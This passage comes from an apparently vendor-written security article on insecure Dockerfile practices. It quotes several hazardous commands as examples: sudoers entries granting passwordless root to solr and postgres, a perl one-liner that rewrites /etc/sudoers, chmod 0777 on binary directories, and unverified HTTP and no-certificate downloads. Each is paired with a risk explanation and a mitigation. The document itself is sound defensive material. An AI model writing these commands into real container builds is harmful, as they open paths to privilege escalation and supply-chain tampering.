install sudo; echo \"\"solr ALL=(ALL) NOPASSWD: ALL\"\" >/etc/sudoers.d/solr;\nAnalyzing this configuration using KIRA immediately highlights the main issue: by installing the sudo package and setting NOPASSWD: ALL for the solr, the user severely violates the principle of least privilege. The Solr platform does not require such broad privileges to run within a container; instead, they create an easy path for escalating to root.\necho 'postgres ALL=(ALL:ALL) NOPASSWD:ALL' >> /etc/sudoers\nIn another example of an insecure configuration, NOPASSWD:ALL privileges are granted to a PostgreSQL database user, which is a direct and severe weakening of the access control policy. If an attacker gains the ability to execute code on behalf of the postgres user \u2013 through a vulnerability in a network service, an SQL injection, or by compromising of one of the processes \u2013 they will immediately and unconditionally be able to execute any commands on behalf of the root user. This is equivalent to the entire container running as root.\nAs a risk mitigation measure, we recommend completely removing this directive. The minimum necessary commands requiring privileges should be delegated on a case-by-case basis via sudoers with explicit specification of allowed executables and parameters, using NOPASSWD only as a last resort and for specific utilities.\nOur AI assistant KIRA can identify even more complex insecure configurations, such as allowing passwordless sudo for the entire sudo group \u2014 by modifying existing rules.\nperl -i -pe 's/\\bALL$/NOPASSWD:ALL/g' /etc/sudoers\nThe risk in this example is that the command replaces standard declarations requiring authentication with passwordless execution of all commands for any user within the sudo group \u2013 potentially including postgres, should it be assigned to that group. This expands the attack surface to all group members, turning each of them into a potential point for instant privilege escalation.\nTo mitigate the risks, we recommend not modifying the global sudoers policy, keeping the standard password requirement, or using a more secure escalation mechanism \u2013 such as gosu to run a specific process on behalf of another user without permanent privileges.\nInsecure file permissions\nAnother common vector for privilege escalation is insecurely configured file and directory permissions. Most often, for convenience, container image authors use 777 permissions, which allow anyone \u2013 including unprivileged users \u2013 to freely create and delete files, as well as modify their contents. This can lead to both privilege escalation and the ability for an unprivileged attacker to delete or modify logs, among other undesirable consequences.\nConsider the following command:\nchmod 0777 /usr/share/cargo /usr/share/cargo/bin\nThe risk is that directories containing binary files and scripts will become writable by any container user. This allows a low-privileged attacker to replace utilities included in cargo or add new malicious executables. When these tools are subsequently invoked, especially as the root user or via sudo, the attacker\u2019s code will execute with the inherited privileges of the calling process, leading directly to a local privilege escalation.\nTo mitigate the risks, you can set the minimum necessary permissions: chmod 0755 for directories and chmod 0755/0644 for the corresponding files. The owner should be root, and only the owner should be allowed to write. Do not use chmod 777 on any system paths.\nLack of integrity checks\nDownloading software without verifying its integrity can make the infrastructure vulnerable to software tampering.\nFor example, this risk may arise when downloading a distribution via HTTP:\nRUN /bin/sh -c wget -qO- \"\"<a href=\"http://acestream.org/downloads/linux/acestream_3.1.49_debian_9.9_x86_64.tar.gz\">acestream.org/downloads/linux/\u2026 | tar --extract --gzip -C /opt/acestream\nUsing HTTP without verifying the archive\u2019s integrity creates conditions for a man-in-the-middle attack during the image build phase. An attacker controlling the communication channel or DNS can replace the archive with malicious content, which will compromise the container and the entire environment in which it runs.\nTo mitigate the risks, you can configure connections to web resources to use HTTPS only \u2014 if the resource supports this protocol. You can also download the archive without extracting it, compare its checksum (SHA256) with the checksum from a trusted source, and only then extract it. It is advisable to store the verified archive in an internal artifact repository to avoid direct downloads from the network.\nThere will still be a MitM risk even if certificate verification is disabled:\nwget --no-check-certificate<a href=\"https://github.com/phpvirtualbox/phpvirtualbox/archive/refs/heads/7.2-dev.zip\"> github.com/phpvirtualbox/phpvi\u2026 -O phpvirtualbox.zip\nThe absence of TLS certificate verification allows an attacker controlling the network segment to replace the downloaded ZIP archive with malicious content. Since the archive contains PHP code that will be executed by the web server, compromise during the build phase will result in the deployment of a backdoor or data leakage.\nTo mitigate the risks, remove the --no-check-certificate flag; after downloading, calculate the SHA256 hash of the archive and verify it against a known reference value (the release page or a local repository of trusted hashes). Additionally, consider using a fixed release (tag) rather than the floating 7.2-dev branch.\nConclusion\nDocker containers have become a very popular means of deploying software, and attackers are by no means oblivious to this trend. They are rapidly adding software vulnerabilities and configuration errors to their arsenal and carrying out attacks on supply chains. They can compromise container infrastructure for a wide variety of purposes, from cryptocurrency mining to encrypting data for ransom or stealing information critical to the company.\nOur research found that 64 out of 100 container images for popular applications contain critically vulnerable software, and only 10% are fully up to date. We also identified numerous insecure configurations, including passwords stored in plaintext in Dockerfiles and excessive privileges granted to users and processes.\nTo detect and prevent these threats, it is essential to strictly adhere to security measures: audit image configurations, securely manage secrets used in images, apply security updates in a timely manner, scan their contents for malware with every update, and follow industry-standard best practices for enhancing security.\nThis approach requires specialized solutions built to accommodate the unique characteristics of container environments. Kaspersky Container Security ensures the security of containerized applications at every stage of their lifecycle, from development to operation. The product protects an organization\u2019s business processes, helps ensure compliance with industry standards and security regulations, and enables the implementation of secure software development practices. \nsecurelist.com/container-secur\u2026", "creation_timestamp": "2026-05-29T07:12:04.306500Z"}]}